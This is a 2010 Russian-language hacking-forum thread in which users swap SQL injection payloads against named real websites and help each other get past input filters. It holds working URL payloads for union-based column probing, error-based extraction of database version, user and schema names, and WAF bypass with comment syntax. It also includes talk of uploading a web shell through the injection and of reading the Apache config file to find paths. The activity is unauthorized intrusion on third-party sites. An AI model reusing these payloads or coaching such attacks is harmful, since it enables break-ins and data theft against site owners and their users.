HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.08.2010, 20:16
Koren
Новичок
Регистрация: 11.07.2009
Сообщений: 3
С нами: 8860452

Репутация: 0
По умолчанию

попугай от того что я перешёл на оперу ничего не изменилось(

IMMORTAL_S софт тот что у меня есть фильтр не обходит
 
Ответить с цитированием

  #2  
Старый 16.08.2010, 21:20
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Koren  
category.php?categoryID=55+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16+--+ указывает на фильтрацию, обхожу фильтр выдаёт цифры для вывода инфы но страница держится не больше 1 секунды, и перекидывает на главгую, возможно что то сделать?
впринцепи решение уже нашёл.. "остановив страницу"))
ну может есть ещё какой способ
т.к не всегда получается успеть нажать на stop
Мдауж, отруби редирект + javascript в браузере.

Цитата:
Сообщение от Koren  
о чём это говорит? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- )) ORD' at line 1
недопустимые символы? или же?
как только не пробывал фильтровать
ответ один и тот же.. либы ошибка(фильтр) или вот это сообщение
)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 --

Цитата:
Сообщение от Byrger  
Вот ссылка, мне не жалко но если кто-то ковырнет раньше меня то поделитесь со всеми
http://www.flashloaded.com/cart/basket.php?action=Add&itemid=6587
Цитата:
Сообщение от None  
http://www.flashloaded.com/cart/basket.php?action=Add&itemid=1+or+1+group+by+conca t(version(),rand(0)|0)+having+min(0)+--+
 
Ответить с цитированием

  #3  
Старый 16.08.2010, 22:45
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами: 8982831

Репутация: 37
По умолчанию

Цитата:
Сообщение от Gorev  
если читалка работает то попробуй найти /etc/httpd/conf/httpd.conf
У меня тоже есть сайтиги где можно через скулю залить шелл, но пути незнаю. Прочитал файл /etc/httpd/conf/httpd.conf , но путей не нашел. Или в конфиге апача не всегда путь найти можно? Кто подскажет?
 
Ответить с цитированием

  #4  
Старый 16.08.2010, 22:49
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от ZARO  
У меня тоже есть сайтиги где можно через скулю залить шелл, но пути незнаю. Прочитал файл
/etc/httpd/conf/httpd.conf
, но путей не нашел. Или в конфиге апача не всегда путь найти можно? Кто подскажет?
Покажи сайт в пм.
 
Ответить с цитированием

  #5  
Старый 17.08.2010, 02:21
Koren
Новичок
Регистрация: 11.07.2009
Сообщений: 3
С нами: 8860452

Репутация: 0
По умолчанию

Charle не во всех случаях помогает отрубленая джаваскрипт
 
Ответить с цитированием

  #6  
Старый 17.08.2010, 12:00
sqlinjector
Новичок
Регистрация: 31.12.2009
Сообщений: 19
С нами: 8611638

Репутация: 10
По умолчанию

Научите плз крутить такие инъекции, когда order by показывает определенное кол-во полей, но union select говорит, что кол-во полей не совпадает.. в общем как бы двойная инъекция должна быть, а вот с синтаксисом у меня траблы...

Код:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264+union+select+1,2,3,4,5,6--&category_id=259
спасибо!
 
Ответить с цитированием

  #7  
Старый 17.08.2010, 15:49
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами: 8982831

Репутация: 37
По умолчанию

Цитата:
Сообщение от sqlinjector  
Научите плз крутить такие инъекции, когда order by показывает определенное кол-во полей, но union select говорит, что кол-во полей не совпадает.. в общем как бы двойная инъекция должна быть, а вот с синтаксисом у меня траблы...
Код:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264+union+select+1,2,3,4,5,6--&category_id=259
спасибо!
И какое кол-во полей тебе показывает order by?

З.Ы.

Код:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264'and+mid(version(),1,1)='4&category_id=259
Код:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264'or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+version()),1,64),floor(rand(0)*2)))='1&category_id=259
Вывод в ошибке - 4.1.22-log
 
Ответить с цитированием

  #8  
Старый 17.08.2010, 15:59
a1ertso
Новичок
Регистрация: 16.12.2009
Сообщений: 29
С нами: 8633638

Репутация: 0
По умолчанию

Есть скуль, фильтрует select или union. Может кто помочь раскрутить ?

Цитата:
Сообщение от None  
http://www.music-master.ru/?action=show_list&cat=11069%27+union+select+1/*
 
Ответить с цитированием

  #9  
Старый 17.08.2010, 16:10
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами: 8982831

Репутация: 37
По умолчанию

Цитата:
Сообщение от a1ertso  
Есть скуль, фильтрует select или union. Может кто помочь раскрутить ?
http://www.music-master.ru/?action=show_list&cat=-11069+'+union+select+concat_ws(0x3a,version(),user (),database())+--+
 
Ответить с цитированием

  #10  
Старый 17.08.2010, 16:16
a1ertso
Новичок
Регистрация: 16.12.2009
Сообщений: 29
С нами: 8633638

Репутация: 0
По умолчанию

ZARO, спасибо. А можете объяснить, почему вывод осуществляется только при соединении строк?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.